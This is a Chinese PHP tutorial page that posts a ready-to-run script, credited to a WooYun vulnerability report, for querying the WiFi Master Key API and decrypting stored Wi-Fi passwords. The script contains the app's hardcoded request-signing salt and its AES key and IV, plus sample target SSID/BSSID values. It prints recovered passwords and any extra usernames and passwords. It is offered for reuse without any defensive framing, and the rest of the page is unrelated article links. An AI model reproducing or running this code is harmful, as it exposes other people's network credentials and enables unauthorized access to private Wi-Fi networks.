首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 PHP

WIFI万能钥匙密码查询接口实例

Posted in PHP onSeptember 28, 2015

不废话了,直接给大家贴代码了

<?php //some code from http://www.wooyun.org/bugs/wooyun-2015-099268
$bssid = "c8:3a:35:fa:b8:80" ;
$ssid = "Podinns2F03" ;
if (isset( $bssid ) && isset( $ssid )){
//update salt
   $ret = request( $bssid , $ssid , md5(rand(1, 10000)));
   $ret = json_decode( $ret );
   $ret = request( $bssid , $ssid , $ret ->retSn);
   $ret = json_decode( $ret );
   if ( $ret ->retCd == 0){
     if ( $ret ->qryapwd->retCd == 0){
       $list = $ret ->qryapwd->psws;
       foreach ( $list as $wifi ){
         echo 'SSID: ' . $wifi ->ssid. "\n" ;
         echo 'PWD: ' .decryptStrin( $wifi ->pwd). "\n" ;
         echo 'BSSID: ' . $wifi ->bssid. "\n" ;
         if ( $wifi ->xUser){
           echo 'xUser: ' . $wifi ->xUser. "\n" ;
           echo 'xPwd: ' . $wifi ->xPwd. "\n" ;
         }
       }
     }
     else {
       echo $ret ->qryapwd->retMsg;
     }
   }
}
function request( $bssid , $ssid , $salt , $dhid = 'ff8080814cc5798a014ccbbdfa375369' ){
   $data = array ();
   $data [ 'appid' ] = '0008' ;
   $data [ 'bssid' ] = $bssid ;
   $data [ 'chanid' ] = 'gw' ;
   $data [ 'dhid' ] = $dhid ;
   $data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac9' ;
   $data [ 'lang' ] = 'cn' ;
   $data [ 'mac' ] = '60f81dad28de' ;
   $data [ 'method' ] = 'getDeepSecChkSwitch' ;
   $data [ 'pid' ] = 'qryapwd:commonswitch' ;
   $data [ 'ssid' ] = $ssid ;
   $data [ 'st' ] = 'm' ;
   $data [ 'uhid' ] = 'a0000000000000000000000000000001' ;
   $data [ 'v' ] = '324' ;
   $data [ 'sign' ] = sign( $data , $salt );
   $curl = curl_init();
   curl_setopt( $curl , CURLOPT_URL, 'http://wifiapi02.51y5.net/wifiapi/fa.cmd' );
   curl_setopt( $curl , CURLOPT_USERAGENT, 'WiFiMasterKey/1.1.0 (Mac OS X Version 10.10.3 (Build 14D136))' );
   curl_setopt( $curl , CURLOPT_SSL_VERIFYPEER, false); // stop verifying certificate
   curl_setopt( $curl , CURLOPT_RETURNTRANSFER, true);
   curl_setopt( $curl , CURLOPT_POST, true); // enable posting
   curl_setopt( $curl , CURLOPT_POSTFIELDS, http_build_query( $data )); // post images
   curl_setopt( $curl , CURLOPT_FOLLOWLOCATION, true); // if any redirection after upload
   $r = curl_exec( $curl );
   curl_close( $curl );
   return $r ;
}
function registerNewDevice(){
   $salt = '1Hf%5Yh&7Og$1Wh!6Vr&7Rs!3Nj#1Aa$' ;
   $data = array ();
   $data [ 'appid' ] = '0008' ;
   $data [ 'bssid' ] = $bssid ;
   $data [ 'chanid' ] = 'gw' ;
   $data [ 'dhid' ] = $dhid ;
   $data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac9' ;
   $data [ 'lang' ] = 'cn' ;
   $data [ 'mac' ] = '60f81dad28de' ;
   $data [ 'method' ] = 'getDeepSecChkSwitch' ;
   $data [ 'pid' ] = 'qryapwd:commonswitch' ;
   $data [ 'ssid' ] = $ssid ;
   $data [ 'st' ] = 'm' ;
   $data [ 'uhid' ] = 'a0000000000000000000000000000001' ;
   $data [ 'v' ] = '324' ;
   $data [ 'sign' ] = sign( $data , $salt );
}
function sign( $array , $salt ){
   // 签名算法
   $request_str = '' ;
   // 对应apk中的 Arrays.sort 数组排序,测试PHP需用 ksort
   ksort( $array );
   foreach ( $array as $key => $value ) {
     $request_str .= $value ;
   }
   $sign = md5( $request_str . $salt );
   return strtoupper ( $sign );
}
function decryptStrin( $str , $keys = 'k%7Ve#8Ie!5Fb&8E' , $iv = 'y!0Oe#2Wj#6Pw!3V' , $cipher_alg =MCRYPT_RIJNDAEL_128){
   //Wi-Fi万能钥匙密码采用 AES/CBC/NoPadding 方式加密
   //[length][password][timestamp]
   $decrypted_string = mcrypt_decrypt( $cipher_alg , $keys , pack( "H*" , $str ),MCRYPT_MODE_CBC, $iv );
   return substr (trim( $decrypted_string ),3,-13);
} ?>

以上代码很简单吗,WIFI万能钥匙密码查询接口代码就全部写完了,希望大家喜欢。

WIFI万能钥匙密码查询接口实例

- Author -

mrr

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐
php 常用类汇总 推荐收藏
May 13 PHP
开启CURL扩展,让服务器支持PHP curl函数(远程采集)
Mar 19 PHP
PHP中数组的三种排序方法分享
May 07 PHP
ThinkPHP模板范围判断输出In标签与Range标签用法详解
Jun 30 PHP
curl和libcurl的区别简介
Jul 01 PHP
详谈php静态方法及普通方法的区别
Oct 04 PHP
php实现文章置顶功能的方法
Oct 20 PHP
使用Zookeeper分布式部署PHP应用程序
Mar 15 PHP
php文件操作之文件写入字符串、数组的方法分析
Apr 15 PHP
PHP实现将上传图片自动缩放到指定分辨率,并保持清晰度封装类示例
Jun 17 PHP
Yii框架组件的事件机制原理与用法分析
Apr 07 PHP
详解PHP Swoole与TCP三次握手
May 27 PHP
百万级别知乎用户数据抓取与分析之PHP开发
Sep 28 #PHP
培养自己的php编码规范
Sep 28 #PHP
ThinkPHP数据操作方法总结
Sep 28 #PHP
ThinkPHP表单数据智能写入create方法实例分析
Sep 27 #PHP
PHP+MySQL之Insert Into数据插入用法分析
Sep 27 #PHP
ThinkPHP中数据操作案例分析
Sep 27 #PHP
PHP中两个float(浮点数)比较实例分析
Sep 27 #PHP
RustDesk(1) 蓝牙(1) 鸿蒙(2) xhunter1.sys(1) Debian(1) 虚拟键盘(1) 蓝牙耳机(1) HarmonyOS(1) 华为(1) 鸿蒙3.0(1)
You might like
php判断用户是否手机访问代码
2015/06/08 PHP
PHP QRCODE生成彩色二维码的方法
2016/05/19 PHP
PDO::commit讲解
2019/01/27 PHP
PHP PDOStatement::getAttribute讲解
2019/02/01 PHP
php生成word并下载代码实例
2019/03/15 PHP
网页和浏览器兼容性问题汇总(draft1)
2009/06/01 Javascript
利用try-catch判断变量是已声明未声明还是未赋值
2014/03/12 Javascript
基于jQuery的JavaScript模版引擎JsRender使用指南
2014/12/29 Javascript
jQuery实现TAB风格的全国省份城市滑动切换效果代码
2015/08/24 Javascript
浅析创建javascript对象的方法
2016/05/13 Javascript
微信小程序 Flex布局详解
2016/10/09 Javascript
JS针对Array的各种操作汇总
2016/11/29 Javascript
在Vue-cli里应用Vuex的state和mutations方法
2018/09/16 Javascript
js+springMVC 提交数组数据到后台的实例
2019/09/21 Javascript
JS精确判断数据类型代码实例
2019/12/18 Javascript
[02:08:58]2014 DOTA2国际邀请赛中国区预选赛 Ne VS CIS
2014/05/22 DOTA
[01:32]2014DOTA2西雅图邀请赛 CIS我们有信心进入正赛
2014/07/08 DOTA
用Python编写一个每天都在系统下新建一个文件夹的脚本
2015/05/04 Python
Python简单实现TCP包发送十六进制数据的方法
2016/04/16 Python
Python判断两个list是否是父子集关系的实例
2018/05/04 Python
利用python画出折线图
2018/07/26 Python
详解python--模拟轮盘抽奖游戏
2019/04/12 Python
浅谈Python访问MySQL的正确姿势
2020/01/07 Python
django admin 根据choice字段选择的不同来显示不同的页面方式
2020/05/13 Python
python中format函数如何使用
2020/06/22 Python
python 发送邮件的四种方法汇总
2020/12/02 Python
CSS3属性选择符介绍
2008/10/17 HTML / CSS
澳大利亚网上玩具商店:Mr Toys Toyworld
2018/03/25 全球购物
节约电力资源的建议书
2014/03/12 职场文书
领导干部群众路线剖析材料
2014/10/09 职场文书
2015年党风廉政建设责任书
2015/01/29 职场文书
python opencv人脸识别考勤系统的完整源码
2021/04/26 Python
MySQL update set 和 and的区别
2021/05/08 MySQL
Python利用folium实现地图可视化
2021/05/23 Python
Python中OpenCV实现查找轮廓的实例
2021/06/08 Python
Java 通过手写分布式雪花SnowFlake生成ID方法详解
2022/04/07 Java/Android